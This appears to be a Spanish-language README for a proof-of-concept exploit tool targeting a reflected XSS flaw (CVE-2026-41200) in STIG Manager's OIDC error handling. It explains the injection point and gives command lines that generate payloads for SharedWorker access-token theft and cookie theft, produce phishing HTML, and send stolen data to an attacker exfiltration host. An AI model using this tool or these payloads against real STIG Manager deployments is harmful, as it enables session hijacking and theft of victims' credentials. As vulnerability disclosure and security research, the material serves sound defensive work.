
Prueba de concepto de la vulnerabilidad de Cross-Site Scripting (XSS) reflejado en STIG Manager versiones 1.5.10 hasta 1.6.7.
Existe una vulnerabilidad de XSS reflejado en el código de manejo de errores de autenticación OIDC de la aplicación web STIG Manager. Los parámetros de consulta error y error_description devueltos por el proveedor OIDC se escriben directamente en el DOM mediante innerHTML sin escape HTML. Un atacante que pueda crear una URL maliciosa y convencer a un usuario para que la siga puede ejecutar JavaScript arbitrario en el contexto de la aplicación.
La vulnerabilidad es más grave cuando el usuario objetivo tiene una sesión activa de STIG Manager en otra pestaña del navegador: el código inyectado puede comunicarse con el SharedWorker que gestiona el token de acceso, lo que permite realizar solicitudes API autenticadas en nombre de la víctima.
# Generate a malicious callback URL (SharedWorker token theft mode)
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m sharedworker
# Generate a simple cookie theft payload
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m simple
# Output as phishing HTML
python3 cve-2026-41200-poc.py --format html
# Custom API and exfil hosts
python3 cve-2026-41200-poc.py \
-c https://stig-manager.example.com/auth/callback \
-a https://stig-manager.example.com \
-e https://attacker.example.com
Esta herramienta se proporciona únicamente con fines educativos e investigación de seguridad autorizada.